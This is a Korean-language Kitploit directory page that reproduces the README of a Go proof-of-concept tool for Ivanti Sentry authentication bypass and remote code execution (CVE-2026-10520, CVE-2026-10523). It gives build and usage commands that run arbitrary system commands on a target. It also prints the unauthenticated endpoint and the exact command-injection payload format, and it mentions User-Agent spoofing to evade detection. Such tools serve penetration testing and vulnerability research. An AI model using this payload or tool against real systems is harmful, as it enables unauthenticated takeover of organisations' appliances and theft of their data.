Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-10523-Ivanti-sentry — Ivanti Sentry 인증 우회 및 원격 코드 실행 취약점(CVE-2026-10520, CVE-2026-10523)에 대한 개념 증명 탐지 도구입니다. 시스템 명령을 실행하고 취약한 배포 환경을 검증하기 위해 조작된 API 요청을 전송합니다. | Kitploit
도구/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlAuthentication
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ivanti Sentry 인증 우회 및 원격 코드 실행 취약점(CVE-2026-10520, CVE-2026-10523)에 대한 개념 증명 탐지 도구입니다. 시스템 명령을 실행하고 취약한 배포 환경을 검증하기 위해 조작된 API 요청을 전송합니다.

저장소 보기웹사이트
31143개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-10523 - Ivanti Sentry RCE 탐지 도구

인증 우회 및 원격 코드 실행과 관련된 Ivanti Sentry 취약점을 테스트하기 위한 포괄적인 개념 증명(PoC) 탐지 도구입니다. 이 도구는 CVE-2026-10520 및 CVE-2026-10523에 취약한 시스템을 식별합니다.

개요

이 프로젝트는 Ivanti Sentry 인스턴스가 심각한 인증 우회 및 원격 코드 실행 결함에 취약한지 탐지하고 검증하도록 설계되었습니다. 이 도구는 Ivanti Sentry API 엔드포인트를 통해 특별히 제작된 메시지를 보내 시스템 명령을 실행하고 결과를 추출하여, 보안 연구원과 침투 테스터가 취약한 배포 환경을 식별할 수 있게 합니다.

취약점 세부 정보

CVE-2026-10520

Ivanti Sentry의 인증 우회 취약점으로, 제한된 API 엔드포인트에 대한 인증 없는 접근을 허용합니다.

CVE-2026-10523

Ivanti Sentry의 원격 코드 실행 취약점으로, 인증 우회와 결합하면 메시징 API를 통해 임의의 시스템 명령 실행을 허용합니다.

기능

  • 취약한 Ivanti Sentry 인스턴스에 대한 인증 없는 탐지
  • 개념 증명 검증을 위한 시스템 명령 실행 기능
  • TLS 검증 우회를 포함한 HTTP 및 HTTPS 연결 지원
  • 중간 서버를 통한 테스트를 위한 프록시 지원
  • XML 응답에서 깔끔한 명령 출력 추출
  • 정보성 피드백을 제공하는 안전한 오류 처리
  • 구성 가능한 타임아웃 및 응답 크기 제한

요구 사항

  • Go 1.26.4 이상
  • 대상 Ivanti Sentry 인스턴스에 대한 네트워크 접근
  • 프로토콜(HTTP 또는 HTTPS)을 포함한 유효한 대상 URL

설치

저장소를 클론하고 프로젝트 디렉터리로 이동합니다:

git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

초기화 및 패키지 라이브러리를 가져옵니다

go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

실행 파일을 빌드합니다:

go build -o tot_poc tot_poc.go

사용법

Screen Capture

이 도구는 두 가지 필수 매개변수가 필요합니다: 대상 URL과 실행할 명령입니다.

기본 사용법

Screen Capture

대상에서 간단한 명령을 실행합니다:

./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

명령줄 옵션

  • -url (필수): 프로토콜을 포함한 대상 기본 URL (예: https://127.0.0.1:8443)
  • -cmd (필수): 취약점 탐지를 위해 실행할 명령 (예: "uname -a", "id", "whoami")
  • -p 또는 -proxy (선택): 트래픽 라우팅을 위한 프록시 주소 및 포트 (예: 127.0.0.1:8080)

사용 예시

Screen Capture

간단한 시스템 정보 명령으로 취약점을 탐지합니다:

./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

프록시 구성으로 실행합니다:

./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

시스템 정보를 추출하기 위해 명령을 실행합니다:

./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

출력

이 도구는 다음을 표시합니다:

  1. 취약점 정보가 포함된 배너
  2. 대상 URL, 명령 및 프록시 구성(해당하는 경우)
  3. 요청 진행 상황을 나타내는 실시간 상태 메시지
  4. 대상이 취약한 경우 명령 실행 결과
  5. 대상이 취약하지 않거나 연결이 실패한 경우 오류 메시지

탐지 성공 출력

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

탐지 실패 출력

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

기술적 세부 사항

공격 벡터

이 도구는 인증 없이 접근 가능한 /mics/api/v2/sentry/mics-config/handleMessage 엔드포인트를 악용합니다. 페이로드는 다음과 같이 구성됩니다:

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

응답에는 성공 태그 내의 XML 형식으로 명령 출력이 포함됩니다.

보안 기능

  • 자체 서명 인증서 테스트를 위한 TLS 검증 우회
  • 요청 대기 방지를 위한 구성 가능한 HTTP 타임아웃
  • 메모리 고갈 방지를 위한 응답 크기 제한(10MB)
  • 잘못된 형식의 응답에 대한 적절한 오류 처리
  • 간단한 탐지 메커니즘을 피하기 위한 User-Agent 스푸핑

작동 방식

  1. 대상 URL 및 명령에 대한 명령줄 인자를 파싱합니다
  2. 선택적 프록시 구성으로 HTTP 클라이언트를 생성합니다
  3. 사용자가 제공한 명령으로 페이로드를 구성합니다
  4. 취약한 엔드포인트에 POST 요청을 보냅니다
  5. XML 응답 구조에서 명령 출력을 추출합니다
  6. 결과 또는 오류 메시지를 적절히 표시합니다

면책 조항

이 도구는 승인된 보안 테스트 및 연구 목적으로만 제공됩니다. 사용자는 시스템을 테스트하기 전에 적절한 승인을 받았는지 확인할 전적인 책임이 있습니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 이 도구로 인한 오용 또는 손상에 대해 책임을 지지 않습니다.

요구 사항 및 제한 사항

  • 대상은 취약한 Ivanti Sentry 인스턴스여야 합니다
  • 대상 시스템에 대한 네트워크 연결이 필요합니다
  • 기본 타임아웃은 요청당 10초입니다
  • 최대 응답 크기는 10MB로 제한됩니다
  • 취약한 버전의 Ivanti Sentry를 실행하는 시스템에서만 효과적입니다
  • 테스트 목적으로 TLS 인증서 검증이 비활성화됩니다

저자

GhostGTR666 - Gagaltotal666

저장소

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

라이선스

이 프로젝트는 보안 연구 및 교육 목적으로 있는 그대로 제공됩니다.

참조

  • CVE-2026-10520: Ivanti Sentry 인증 우회
  • CVE-2026-10523: Ivanti Sentry 원격 코드 실행
도구 다운로드